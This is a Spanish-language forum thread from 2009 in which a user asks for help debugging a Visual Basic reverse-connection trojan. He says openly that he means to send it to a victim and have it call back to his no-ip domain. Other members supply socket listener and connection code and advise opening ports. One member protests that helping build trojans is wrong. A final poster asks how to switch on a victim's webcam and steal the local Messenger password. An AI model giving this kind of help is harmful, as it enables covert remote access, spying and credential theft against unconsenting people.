Ayuda Troyano conexion inversa

Iniciado por sircam666, 24 Junio 2009, 00:57 AM

0 Miembros y 3 Visitantes están viendo este tema.

sircam666

Saludos

regreso a este foro despues de ojearlo hace ya bastante tiempo para ver si alguien me puede ayudar con un problema,
estoy creando un troyano en VB de conexion inversa y pues tecnicamente ya termine, pero las pruebas las estaba realizando en el mismo PC, es decir el winsock se conectaba a la IP local,
entonces luego cambie por un dominio en noip.com, dado que mi IP es dinamica y ya tenia intenciones de enviarlo a la victima, pero antes de enviarlo, decidi probar en la misma PC ( no se si es por eso..)  y pues puse el programa a la escucha y ejecute el otro que se deberia conectar pero no paso nada...
entonces para mirar que pasaba puse un Msgbox que me indicaba el estado de conexion y me arrojo 4, mire y dice que es Resolviendo Host, y pues la verdad no se que significa XD, ni tampoco como arreglarlo jeje,
agradezco mucho a el que me pueda colaborar, es mi primer troyano usando el CSocketMaster , y creo que me estaba quedando bien jejeje
Gracias de antemano

sircam666

Vamos, nadie me ayuda XD   :silbar:

jeje

fede_cp

buenas, lo que te recomiendo para ayudarte con mas precicion es que dejes tu codigo de como hiciste la conexion, y fijate de que el CScoketMaster lo hayas bajado de la pagina oficial

saludos
somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!

sircam666

en ese caso pongo el fracmento de codigo que se supone coloca a la escucha el Cliente

Private Sub Command1_Click()
ws2.CloseSck
ws2.Protocol = sckTCPProtocol
ws2.LocalPort = 5548

ws2.Listen
End Sub

y el otro esta en un timer

Private Sub Timer1_Timer()

If Not WS.State = 7 Then
WS.CloseSck
WS.RemotePort = 5548
WS.RemoteHost = "sircam66.no-ip.biz"
WS.Connect

Else
Timer1.Enabled = False
End If
End Sub

y creo que ese seria el pedacito que importa, de todas formas, puedes pasarme la pagina oficial del CSocketMAster
Gracias

fede_cp

#4
el code está bien lo que está fallando es el no-ip.. te doy una sugerencia...

porque no le decis a algún voluntario XD(amigo tuyo o algo) y vas probando cada vez que estes en duda,  ahora hace esto:

en vez de poner tu no-ip pone tu ip dinámica común (no vayas a probar con "127.0.0.1"  :P) jaja
y despues pusiste el :

Código (vb) [Seleccionar]
Option Explicit
Public WithEvents ws2 As CSocketMaster


y despues en el form_load:

Código (vb) [Seleccionar]
Set ws2 = New CSocketMaster

y pone un label en el cliente o lo que quieras que sea

Código (vb) [Seleccionar]
if ws2.state = sckConnected then
label.caption = "conectado"
else
label.caption = "desconectado"



un saludo
somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!

sircam666

Saludos

bueno probe lo que me dijiste y no funciono no se porque  :huh:
le cambie el dominio de no-ip por mi ip se lo envie a mi amigo y le deje el msgbox que muestra el estado de la conexión, entoces coloce a escuchar el programa en mi pc y le dije a mi compañero que lo ejecutara y bueno le salieron los mensajes de el estado y siempre era 6, osea conectando, y no se conectaba
igual cada vez que el le daba aceptar a el Msgbox se supone que se debia interntar conectar pero no sirvio, la verdad no tengo idea.........
la otra duda que me surgio ahora es que el winsock tiene otro protocolo que es UDP y quisiera saber si con este protocolo se podria hacer un troyano, la verdad se muy poco acerca de este pero, me nace la duda
Gracias

BlackZeroX

#6
Este es un ejemplo con CSocketPlus es igual que el CSocketMaster solo que:

CSocketPlu= Usa Arrays
CSocketMaster= No usa Array

PERO SUS EVENTOS SON LOS MISMOS Tomando en cuenta la diferencia de INDEX

A lo que voy es que pruebes con poner el ConnectionRequestID:

Para CSocketMaster:
Revisa este por que no cuento con los archivos del CSocketMaster asi que deduci lo siguiente...¡!
Código (vb) [Seleccionar]

Dim WithEvents ws0 As CSocketPMater
'En un procesoX
Set ws0 = New CSocketMaster
'ws0.CloseSck 'Cuando agregas uno ya esta cerrado por logica
ws0.LocalPort = 453
ws0.Listen
'Fin de Proceso X

Private Sub ws0_ConnectionRequest(ByVal requestID As Long)
   ws0.CloseSck
   ws0.Accept requestID
End Sub

Private Sub ws0_DataArrival(ByVal bytesTotal As Long)
   Dim datos As String
   ws0.GetData datos, vbString
   Text1 = Text1 & vbCrLf & datos
End Sub


Para CSocketPlus

Código (vb) [Seleccionar]

Dim WithEvents ws0 As CSocketPlus
'En un procesoX
Set ws0 = New CSocketPlus
ws0.ArrayAdd 0
'ws0.CloseSck 0 'Cuando agregas uno ya esta cerrado por logica
ws0.LocalPort(0) = 453
ws0.Listen 0
'Fin de Proceso X

Private Sub ws0_ConnectionRequest(ByVal Index As Variant, ByVal requestID As Long)
   ws0.CloseSck Index
   ws0.Accept Index, requestID
End Sub

Private Sub ws0_DataArrival(ByVal Index As Variant, ByVal bytesTotal As Long)
   Dim datos As String
   ws0.GetData Index, datos, vbString
   Text1 = Text1 & vbCrLf & datos
End Sub


Como viste la unica diferencia es que en uno siempre se maneja una variable index (CSocketPluys) y en otro no (CSocketMaster).


Para ver si esta conectado o no sin usar timer en donde usas el Sock con el evento Connect es decir el cliente no el servidor (en el source donde espesificas el ip a conectar). puedes meter estos eventos

CSocketMaster:
Código (vb) [Seleccionar]

Private Sub ws0_Connect()
   MsgBox "Socket Conectado"
End Sub
Private Sub ws0_CloseSck()
   MsgBox "Socket Desconectado"
End Sub
Private Sub ws0_Error( ByVal Number As Integer, Description As String, ByVal sCode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
   MsgBox "Sock Error"
End Sub


CSocketPlus
Código (vb) [Seleccionar]

Private Sub ws0_Connect(ByVal Index As Variant)
   MsgBox "Socket Conectado"
End Sub
Private Sub ws0_CloseSck(ByVal Index As Variant)
   MsgBox "Socket Desconectado"
End Sub
Private Sub ws0_Error(ByVal Index As Variant, ByVal Number As Integer, Description As String, ByVal sCode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
   MsgBox "Sock Error"
End Sub


P.D.: Con respecto a la DNS sea cual sea (No-ip,dyndns o como sea "X")  deberias rectificar los puetos que deberias abrir para tal acción, tanto en firewall de windows como de av como los de router si llegases a usar (Esto va en su foro correspondiente).

Dulces Lunas¡!
The Dark Shadow is my passion.

sircam666

Gracias, igual ahora me voy de viaje espero llegar con nuevas energias para terminar ese troyano, talves tenga que volver a el papel y diseñaslo de nuevo con el CSocketPlus

Gracias

seba123neo

que ganas ░▒▓BlackZeroҖ▓▒░...reconozoco tu ganas de ayudar...pero habiendo tantos ejemplos basicos de estos "programas" de troyanos suelto en internet...ya no es ayudar sino dar en bandeja...que se "maten" buscando en internet vos no te preocupes...ya todos estos temas que preguntan como hacer un troyano ya todos los foreros debemos saber que tienen que buscar en internet otra no hay...pero ni le des mas codigo que lo busquen como nosotros tuvimos que buscarlo algun dia...porque sino van a venir a preguntar cualuquier "duda" y nosotros los "bulu del foro" le vamos a contestar...esto no va para este tema ..sino para todos los temas que haya asi igual en el foro...ya lo dije alguna vez..pero ni caso hacen...

saludos.
La característica extraordinaria de las leyes de la física es que se aplican en todos lados, sea que tú elijas o no creer en ellas. Lo bueno de las ciencias es que siempre tienen la verdad, quieras creerla o no.

Neil deGrasse Tyson

mr_marley

HOla sabes yo tambien me estoy programando un troyano si me pudieras ayudar con algunas funciones como prenderle la webcam.. sacar el password local del messenger
algo

By:Marley87
Cuántas muertes más serán necesarias para darnos cuenta de que ya han sido demasiadas  By: Marley87